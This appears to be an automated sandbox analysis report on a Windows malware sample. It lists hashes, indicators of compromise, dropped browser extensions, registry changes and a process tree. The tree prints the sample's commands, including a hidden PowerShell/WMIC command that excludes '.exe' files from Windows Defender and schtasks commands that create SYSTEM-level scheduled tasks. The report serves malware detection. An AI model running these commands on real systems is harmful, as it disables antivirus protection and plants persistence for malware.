Analysis
-
max time kernel
151s -
max time network
159s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
09/04/2024, 05:00
Static task
static1
Behavioral task
behavioral1
Sample
24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2.exe
Resource
win10v2004-20240226-en
General
-
Target
24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2.exe
-
Size
6.4MB
-
MD5
defd4f7b77fae9fed1fe7f1b6871e126
-
SHA1
c118c185b6886063b258eb06abd6c342acab07a7
-
SHA256
24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2
-
SHA512
1e496d278e003c18aea9ce99b3f0383eb7835a59fc75bbeaf5a1a79074ab46e7e178f77a63b5937cfd04781bb82550671403f6749388a25ba64030a9a30930f2
-
SSDEEP
196608:91OY/7zYrLNbdwsL6afXVVuJJREXmb/YRDuAD2hI:3OYTzkbdwByX61E64jShI
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 75 1088 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-609813121-2907144057-1731107329-1000\Control Panel\International\Geo\Nation Install.exe -
Executes dropped EXE 2 IoCs
pid Process 3688 Install.exe 4052 GOWGHoQ.exe -
Loads dropped DLL 1 IoCs
pid Process 1088 rundll32.exe -
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json YDrPjem.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json YDrPjem.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini YDrPjem.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 YDrPjem.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 YDrPjem.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache YDrPjem.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 YDrPjem.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 YDrPjem.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak YDrPjem.exe File created C:\Program Files (x86)\mGmtaSbzEpNU2\FwDOJAOroEfUC.dll YDrPjem.exe File created C:\Program Files (x86)\mGmtaSbzEpNU2\mtDkEIX.xml YDrPjem.exe File created C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR\bFJlOWg.dll YDrPjem.exe File created C:\Program Files (x86)\amAbAfOnXOhKC\uJOPQZb.dll YDrPjem.exe File created C:\Program Files (x86)\FryTaOrDbWUn\XpgAdcL.dll YDrPjem.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi YDrPjem.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja YDrPjem.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak YDrPjem.exe File created C:\Program Files (x86)\kGPyqjuOAqmAJMHnolR\fDPNxpS.xml YDrPjem.exe File created C:\Program Files (x86)\amAbAfOnXOhKC\HxmFsRe.xml YDrPjem.exe File created C:\Program Files (x86)\uAxUdthdU\wOArEU.dll YDrPjem.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi YDrPjem.exe File created C:\Program Files (x86)\uAxUdthdU\udbPYCB.xml YDrPjem.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bgNHpsssZstYPMxCCI.job schtasks.exe File created C:\Windows\Tasks\eMHQCETsWPnVYjMqf.job schtasks.exe File created C:\Windows\Tasks\jPOTMwMCmHcirds.job schtasks.exe File created C:\Windows\Tasks\iQotdfZjyOUckLeEG.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 10 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4580 schtasks.exe 4304 schtasks.exe 4112 schtasks.exe 1760 schtasks.exe 1708 schtasks.exe 1276 schtasks.exe 1408 schtasks.exe 116 schtasks.exe 2232 schtasks.exe 1100 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume YDrPjem.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{0e54dc8f-0000-0000-0000-d01200000000}\NukeOnDelete = "0" YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\SlowContextMenuEntries = 6024b221ea3a6910a2dc08002b30309d9c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" YDrPjem.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix YDrPjem.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1888 powershell.exe 1888 powershell.exe 4368 powershell.exe 4368 powershell.exe 3012 powershell.exe 3012 powershell.exe 5016 powershell.EXE 5016 powershell.EXE 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 4884 powershell.exe 4884 powershell.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe 1544 YDrPjem.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1888 powershell.exe Token: SeIncreaseQuotaPrivilege 1276 WMIC.exe Token: SeSecurityPrivilege 1276 WMIC.exe Token: SeTakeOwnershipPrivilege 1276 WMIC.exe Token: SeLoadDriverPrivilege 1276 WMIC.exe Token: SeSystemProfilePrivilege 1276 WMIC.exe Token: SeSystemtimePrivilege 1276 WMIC.exe Token: SeProfSingleProcessPrivilege 1276 WMIC.exe Token: SeIncBasePriorityPrivilege 1276 WMIC.exe Token: SeCreatePagefilePrivilege 1276 WMIC.exe Token: SeBackupPrivilege 1276 WMIC.exe Token: SeRestorePrivilege 1276 WMIC.exe Token: SeShutdownPrivilege 1276 WMIC.exe Token: SeDebugPrivilege 1276 WMIC.exe Token: SeSystemEnvironmentPrivilege 1276 WMIC.exe Token: SeRemoteShutdownPrivilege 1276 WMIC.exe Token: SeUndockPrivilege 1276 WMIC.exe Token: SeManageVolumePrivilege 1276 WMIC.exe Token: 33 1276 WMIC.exe Token: 34 1276 WMIC.exe Token: 35 1276 WMIC.exe Token: 36 1276 WMIC.exe Token: SeIncreaseQuotaPrivilege 1276 WMIC.exe Token: SeSecurityPrivilege 1276 WMIC.exe Token: SeTakeOwnershipPrivilege 1276 WMIC.exe Token: SeLoadDriverPrivilege 1276 WMIC.exe Token: SeSystemProfilePrivilege 1276 WMIC.exe Token: SeSystemtimePrivilege 1276 WMIC.exe Token: SeProfSingleProcessPrivilege 1276 WMIC.exe Token: SeIncBasePriorityPrivilege 1276 WMIC.exe Token: SeCreatePagefilePrivilege 1276 WMIC.exe Token: SeBackupPrivilege 1276 WMIC.exe Token: SeRestorePrivilege 1276 WMIC.exe Token: SeShutdownPrivilege 1276 WMIC.exe Token: SeDebugPrivilege 1276 WMIC.exe Token: SeSystemEnvironmentPrivilege 1276 WMIC.exe Token: SeRemoteShutdownPrivilege 1276 WMIC.exe Token: SeUndockPrivilege 1276 WMIC.exe Token: SeManageVolumePrivilege 1276 WMIC.exe Token: 33 1276 WMIC.exe Token: 34 1276 WMIC.exe Token: 35 1276 WMIC.exe Token: 36 1276 WMIC.exe Token: SeDebugPrivilege 4368 powershell.exe Token: SeDebugPrivilege 3012 powershell.exe Token: SeDebugPrivilege 5016 powershell.EXE Token: SeDebugPrivilege 4884 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1704 WMIC.exe Token: SeIncreaseQuotaPrivilege 1704 WMIC.exe Token: SeSecurityPrivilege 1704 WMIC.exe Token: SeTakeOwnershipPrivilege 1704 WMIC.exe Token: SeLoadDriverPrivilege 1704 WMIC.exe Token: SeSystemtimePrivilege 1704 WMIC.exe Token: SeBackupPrivilege 1704 WMIC.exe Token: SeRestorePrivilege 1704 WMIC.exe Token: SeShutdownPrivilege 1704 WMIC.exe Token: SeSystemEnvironmentPrivilege 1704 WMIC.exe Token: SeUndockPrivilege 1704 WMIC.exe Token: SeManageVolumePrivilege 1704 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1704 WMIC.exe Token: SeIncreaseQuotaPrivilege 1704 WMIC.exe Token: SeSecurityPrivilege 1704 WMIC.exe Token: SeTakeOwnershipPrivilege 1704 WMIC.exe Token: SeLoadDriverPrivilege 1704 WMIC.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2148 wrote to memory of 3688 2148 24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2.exe 87 PID 2148 wrote to memory of 3688 2148 24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2.exe 87 PID 2148 wrote to memory of 3688 2148 24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2.exe 87 PID 3688 wrote to memory of 5048 3688 Install.exe 92 PID 3688 wrote to memory of 5048 3688 Install.exe 92 PID 3688 wrote to memory of 5048 3688 Install.exe 92 PID 5048 wrote to memory of 1104 5048 forfiles.exe 94 PID 5048 wrote to memory of 1104 5048 forfiles.exe 94 PID 5048 wrote to memory of 1104 5048 forfiles.exe 94 PID 1104 wrote to memory of 1888 1104 cmd.exe 95 PID 1104 wrote to memory of 1888 1104 cmd.exe 95 PID 1104 wrote to memory of 1888 1104 cmd.exe 95 PID 3688 wrote to memory of 1708 3688 Install.exe 97 PID 3688 wrote to memory of 1708 3688 Install.exe 97 PID 3688 wrote to memory of 1708 3688 Install.exe 97 PID 1888 wrote to memory of 1276 1888 powershell.exe 101 PID 1888 wrote to memory of 1276 1888 powershell.exe 101 PID 1888 wrote to memory of 1276 1888 powershell.exe 101 PID 4368 wrote to memory of 4940 4368 powershell.exe 107 PID 4368 wrote to memory of 4940 4368 powershell.exe 107 PID 4368 wrote to memory of 4940 4368 powershell.exe 107 PID 4940 wrote to memory of 4736 4940 cmd.exe 108 PID 4940 wrote to memory of 4736 4940 cmd.exe 108 PID 4940 wrote to memory of 4736 4940 cmd.exe 108 PID 4368 wrote to memory of 4192 4368 powershell.exe 109 PID 4368 wrote to memory of 4192 4368 powershell.exe 109 PID 4368 wrote to memory of 4192 4368 powershell.exe 109 PID 4368 wrote to memory of 4424 4368 powershell.exe 110 PID 4368 wrote to memory of 4424 4368 powershell.exe 110 PID 4368 wrote to memory of 4424 4368 powershell.exe 110 PID 4368 wrote to memory of 3960 4368 powershell.exe 111 PID 4368 wrote to memory of 3960 4368 powershell.exe 111 PID 4368 wrote to memory of 3960 4368 powershell.exe 111 PID 4368 wrote to memory of 2476 4368 powershell.exe 112 PID 4368 wrote to memory of 2476 4368 powershell.exe 112 PID 4368 wrote to memory of 2476 4368 powershell.exe 112 PID 4368 wrote to memory of 748 4368 powershell.exe 113 PID 4368 wrote to memory of 748 4368 powershell.exe 113 PID 4368 wrote to memory of 748 4368 powershell.exe 113 PID 4368 wrote to memory of 1840 4368 powershell.exe 114 PID 4368 wrote to memory of 1840 4368 powershell.exe 114 PID 4368 wrote to memory of 1840 4368 powershell.exe 114 PID 4368 wrote to memory of 3644 4368 powershell.exe 115 PID 4368 wrote to memory of 3644 4368 powershell.exe 115 PID 4368 wrote to memory of 3644 4368 powershell.exe 115 PID 4368 wrote to memory of 4284 4368 powershell.exe 116 PID 4368 wrote to memory of 4284 4368 powershell.exe 116 PID 4368 wrote to memory of 4284 4368 powershell.exe 116 PID 4368 wrote to memory of 1544 4368 powershell.exe 117 PID 4368 wrote to memory of 1544 4368 powershell.exe 117 PID 4368 wrote to memory of 1544 4368 powershell.exe 117 PID 4368 wrote to memory of 884 4368 powershell.exe 118 PID 4368 wrote to memory of 884 4368 powershell.exe 118 PID 4368 wrote to memory of 884 4368 powershell.exe 118 PID 4368 wrote to memory of 536 4368 powershell.exe 119 PID 4368 wrote to memory of 536 4368 powershell.exe 119 PID 4368 wrote to memory of 536 4368 powershell.exe 119 PID 4368 wrote to memory of 2920 4368 powershell.exe 120 PID 4368 wrote to memory of 2920 4368 powershell.exe 120 PID 4368 wrote to memory of 2920 4368 powershell.exe 120 PID 4368 wrote to memory of 2348 4368 powershell.exe 121 PID 4368 wrote to memory of 2348 4368 powershell.exe 121 PID 4368 wrote to memory of 2348 4368 powershell.exe 121 PID 4368 wrote to memory of 3760 4368 powershell.exe 122
Processes
-
C:\Users\Admin\AppData\Local\Temp\24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2.exe"C:\Users\Admin\AppData\Local\Temp\24aac3594f7d73c0e854b80b14ff785c28aa6dfd50e0c0113e47f17c1dc82df2.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Users\Admin\AppData\Local\Temp\7zS878F.tmp\Install.exe.\Install.exe /mpdidxP "385118" /S2⤵
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"3⤵
- Suspicious use of WriteProcessMemory
PID:5048 -
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True4⤵
- Suspicious use of WriteProcessMemory
PID:1104 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888 -
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True6⤵
- Suspicious use of AdjustPrivilegeToken
PID:1276
-
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bgNHpsssZstYPMxCCI" /SC once /ST 05:02:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\GOWGHoQ.exe\" mP /sosite_idlgc 385118 /S" /V1 /F3⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1708
-
-
-
C:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\GOWGHoQ.exeC:\Users\Admin\AppData\Local\Temp\GsQRrtwSziAnYplPc\CShgmbCUeIuNzVH\GOWGHoQ.exe mP /sosite_idlgc 385118 /S1⤵
- Executes dropped EXE
PID:4052 -
